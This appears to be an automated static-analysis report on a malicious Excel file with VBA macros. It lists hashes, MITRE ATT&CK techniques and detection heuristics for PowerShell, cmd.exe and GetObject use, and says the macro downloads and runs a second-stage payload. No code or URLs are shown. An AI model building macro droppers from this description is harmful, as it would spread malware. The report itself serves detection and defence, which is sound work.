Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 335d37e7b4b79faa…

MALICIOUS

Office (OOXML)

41.5 KB Created: 2021-06-22 12:43:05 UTC Authoring application: Microsoft Excel 16.0300
MD5: fe23c92c9f03e4bd4f71ac9ef8b24a34 SHA-1: 1fb29b8a2f083c140092447eb95ebdbc7d654c36 SHA-256: 335d37e7b4b79faa00517eb680da75ecd58c800a84de30813e4624b03325346e
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

This Excel document contains VBA macros that reference PowerShell and cmd.exe, indicating an attempt to execute commands. The GetObject call further suggests dynamic execution of code. The primary function of the VBA macro appears to be downloading and executing a second-stage payload, though the exact URL is obfuscated within the script.

Heuristics 4

  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
17329826a372cf58a4bcdc0f574b7bb78178aa11cdb371f8c076797c5ea2d426		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34430 bytes
vbaProject_00.bin
e368c61b316a6aad0c19545664b89156a21193dab95c2ea6ab712d510fdb5a2f		 vba-project OOXML VBA project: xl/vbaProject.bin 11264 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.